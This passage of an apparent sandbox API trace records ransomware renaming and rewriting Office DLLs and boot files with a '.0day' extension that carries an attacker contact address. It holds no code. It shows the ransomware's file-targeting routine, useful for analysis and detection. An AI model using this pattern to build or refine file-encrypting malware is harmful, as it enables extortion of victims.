"c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0056.483] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0056.483] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.483] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.483] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0056.484] GetLastError () returned 0x0 [0056.484] ReadFile (in: hFile=0x244, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x51d0, lpOverlapped=0x0) returned 1 [0056.486] WriteFile (in: hFile=0x17c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x51e0, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0x51e0, lpOverlapped=0x0) returned 1 [0056.487] ReadFile (in: hFile=0x244, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.487] WriteFile (in: hFile=0x17c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xea, lpOverlapped=0x0) returned 1 [0056.487] SetEndOfFile (hFile=0x17c) returned 1 [0056.487] CloseHandle (hObject=0x17c) returned 1 [0056.487] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.488] SetEndOfFile (hFile=0x244) returned 1 [0056.488] CloseHandle (hObject=0x244) returned 1 [0056.488] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.489] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll")) returned 1 [0056.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0056.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0056.489] lstrlenW (lpString=".doc") returned 4 [0056.489] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.489] lstrlenW (lpString=".docx") returned 5 [0056.489] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0056.489] lstrlenW (lpString=".pdf") returned 4 [0056.489] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.489] lstrlenW (lpString=".xls") returned 4 [0056.489] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.489] lstrlenW (lpString=".xlsx") returned 5 [0056.489] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0056.489] lstrlenW (lpString=".ppt") returned 4 [0056.489] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0056.489] lstrlenW (lpString=".zip") returned 4 [0056.489] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.489] lstrlenW (lpString=".rar") returned 4 [0056.489] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.489] lstrlenW (lpString=".bz2") returned 4 [0056.489] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.489] lstrlenW (lpString=".7z") returned 3 [0056.490] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0056.490] lstrlenW (lpString=".dbf") returned 4 [0056.490] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0056.490] lstrlenW (lpString=".1cd") returned 4 [0056.490] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0056.490] lstrlenW (lpString=".jpg") returned 4 [0056.490] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0056.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0056.490] lstrlenW (lpString=".doc") returned 4 [0056.490] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.490] lstrlenW (lpString=".docx") returned 5 [0056.490] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0056.490] lstrlenW (lpString=".pdf") returned 4 [0056.490] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.490] lstrlenW (lpString=".xls") returned 4 [0056.490] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.490] lstrlenW (lpString=".xlsx") returned 5 [0056.490] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0056.490] lstrlenW (lpString=".ppt") returned 4 [0056.490] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0056.490] lstrlenW (lpString=".zip") returned 4 [0056.490] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.490] lstrlenW (lpString=".rar") returned 4 [0056.490] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.490] lstrlenW (lpString=".bz2") returned 4 [0056.490] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.491] lstrlenW (lpString=".7z") returned 3 [0056.491] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.491] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0056.491] lstrlenW (lpString=".dbf") returned 4 [0056.491] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.491] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0056.491] lstrlenW (lpString=".1cd") returned 4 [0056.491] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.491] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0056.491] lstrlenW (lpString=".jpg") returned 4 [0056.491] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.491] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0056.491] lstrlenW (lpString="ACEWSTR.DLL") returned 11 [0056.491] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0056.491] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=862608) returned 1 [0056.492] CloseHandle (hObject=0x244) returned 1 [0056.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll")) returned 0x20 [0056.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0056.492] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0056.492] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.492] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.492] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0056.492] GetLastError () returned 0x0 [0056.492] ReadFile (in: hFile=0x244, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0xd2990, lpOverlapped=0x0) returned 1 [0056.510] WriteFile (in: hFile=0x17c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xd29a0, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xd29a0, lpOverlapped=0x0) returned 1 [0056.526] ReadFile (in: hFile=0x244, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.526] WriteFile (in: hFile=0x17c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xea, lpOverlapped=0x0) returned 1 [0056.526] SetEndOfFile (hFile=0x17c) returned 1 [0056.526] CloseHandle (hObject=0x17c) returned 1 [0056.526] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.527] SetEndOfFile (hFile=0x244) returned 1 [0057.422] CloseHandle (hObject=0x244) returned 1 [0057.422] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.423] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll")) returned 1 [0057.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0057.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0057.595] lstrlenW (lpString=".doc") returned 4 [0057.595] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.595] lstrlenW (lpString=".docx") returned 5 [0057.595] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0057.595] lstrlenW (lpString=".pdf") returned 4 [0057.595] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.595] lstrlenW (lpString=".xls") returned 4 [0057.595] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.595] lstrlenW (lpString=".xlsx") returned 5 [0057.595] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0057.595] lstrlenW (lpString=".ppt") returned 4 [0057.595] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0057.595] lstrlenW (lpString=".zip") returned 4 [0057.595] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.595] lstrlenW (lpString=".rar") returned 4 [0057.595] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.595] lstrlenW (lpString=".bz2") returned 4 [0057.595] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.595] lstrlenW (lpString=".7z") returned 3 [0057.595] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0057.595] lstrlenW (lpString=".dbf") returned 4 [0057.595] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0057.595] lstrlenW (lpString=".1cd") returned 4 [0057.595] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0057.596] lstrlenW (lpString=".jpg") returned 4 [0057.596] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0057.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0057.596] lstrlenW (lpString=".doc") returned 4 [0057.596] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.596] lstrlenW (lpString=".docx") returned 5 [0057.596] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0057.596] lstrlenW (lpString=".pdf") returned 4 [0057.596] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.596] lstrlenW (lpString=".xls") returned 4 [0057.596] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.596] lstrlenW (lpString=".xlsx") returned 5 [0057.596] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0057.596] lstrlenW (lpString=".ppt") returned 4 [0057.596] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0057.596] lstrlenW (lpString=".zip") returned 4 [0057.596] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.596] lstrlenW (lpString=".rar") returned 4 [0057.596] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.596] lstrlenW (lpString=".bz2") returned 4 [0057.596] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.596] lstrlenW (lpString=".7z") returned 3 [0057.596] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0057.596] lstrlenW (lpString=".dbf") returned 4 [0057.596] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0057.596] lstrlenW (lpString=".1cd") returned 4 [0057.596] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0057.597] lstrlenW (lpString=".jpg") returned 4 [0057.597] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.597] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0057.597] lstrlenW (lpString="ACEDAO.DLL") returned 10 [0057.597] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0057.630] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=744888) returned 1 [0057.630] CloseHandle (hObject=0x174) returned 1 [0057.630] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll")) returned 0x20 [0057.630] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0057.630] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0057.630] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.630] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.630] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0057.942] GetLastError () returned 0x0 [0057.942] ReadFile (hFile=0x174, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0) Thread: id = 17 os_tid = 0xad4 [0032.936] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x3790f78 [0032.937] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x37a0f80 [0032.937] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6403f8 [0032.937] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x6430d8 [0032.937] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640410 [0032.937] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x100000) returned 0x3c80020 [0032.937] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640428 [0032.937] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x640428, Size=0x20) returned 0x3720380 [0032.937] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640428 [0032.937] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x640428, Size=0x20) returned 0x37203a8 [0032.938] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.938] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.938] Wow64DisableWow64FsRedirection (in: OldValue=0x34bff58 | out: OldValue=0x34bff58*=0x0) returned 1 [0032.938] lstrlenW (lpString="kernel32.dll") returned 12 [0032.938] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3720380 | out: hHeap=0x5f0000) returned 1 [0032.938] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.938] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37203a8 | out: hHeap=0x5f0000) returned 1 [0032.938] Sleep (dwMilliseconds=0x64) [0033.102] lstrcmpiW (lpString1=".ttf", lpString2=".0day") returned 1 [0033.102] lstrlenW (lpString="jpn_boot.ttf") returned 12 [0033.102] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0033.713] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=1984228) returned 1 [0033.713] CloseHandle (hObject=0x174) returned 1 [0033.713] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20 [0033.713] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.713] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0033.714] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0033.714] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0033.714] lstrlenW (lpString=".doc") returned 4 [0033.714] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0033.714] lstrlenW (lpString=".docx") returned 5 [0033.714] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0033.714] lstrlenW (lpString=".pdf") returned 4 [0033.714] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0033.714] lstrlenW (lpString=".xls") returned 4 [0033.714] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0033.714] lstrlenW (lpString=".xlsx") returned 5 [0033.714] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0033.714] lstrlenW (lpString=".ppt") returned 4 [0033.714] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0033.714] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0033.714] lstrlenW (lpString=".zip") returned 4 [0033.714] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0033.714] lstrlenW (lpString=".rar") returned 4 [0033.714] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0033.714] lstrlenW (lpString=".bz2") returned 4 [0033.714] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0033.714] lstrlenW (lpString=".7z") returned 3 [0033.714] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0033.714] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0033.714] lstrlenW (lpString=".dbf") returned 4 [0033.714] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0033.714] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0033.714] lstrlenW (lpString=".1cd") returned 4 [0033.714] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0033.714] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0033.714] lstrlenW (lpString=".jpg") returned 4 [0033.714] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0033.715] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0033.715] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0033.715] lstrlenW (lpString=".doc") returned 4 [0033.715] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0033.715] lstrlenW (lpString=".docx") returned 5 [0033.715] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0033.715] lstrlenW (lpString=".pdf") returned 4 [0033.715] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0033.715] lstrlenW (lpString=".xls") returned 4 [0033.715] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0033.715] lstrlenW (lpString=".xlsx") returned 5 [0033.715] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0033.715] lstrlenW (lpString=".ppt") returned 4 [0033.715] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0033.715] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0033.715] lstrlenW (lpString=".zip") returned 4 [0033.715] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0033.715] lstrlenW (lpString=".rar") returned 4 [0033.715] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0033.715] lstrlenW (lpString=".bz2") returned 4 [0033.715] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0033.715] lstrlenW (lpString=".7z") returned 3 [0033.715] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0033.715] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0033.715] lstrlenW (lpString=".dbf") returned 4 [0033.716] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0033.716] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0033.716] lstrlenW (lpString=".1cd") returned 4 [0033.716] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0033.716] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0033.716] lstrlenW (lpString=".jpg") returned 4 [0033.716] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0033.716] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0033.716] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0033.716] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0033.716] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=93248) returned 1 [0033.716] CloseHandle (hObject=0x174) returned 1 [0033.716] GetFileAttributesW 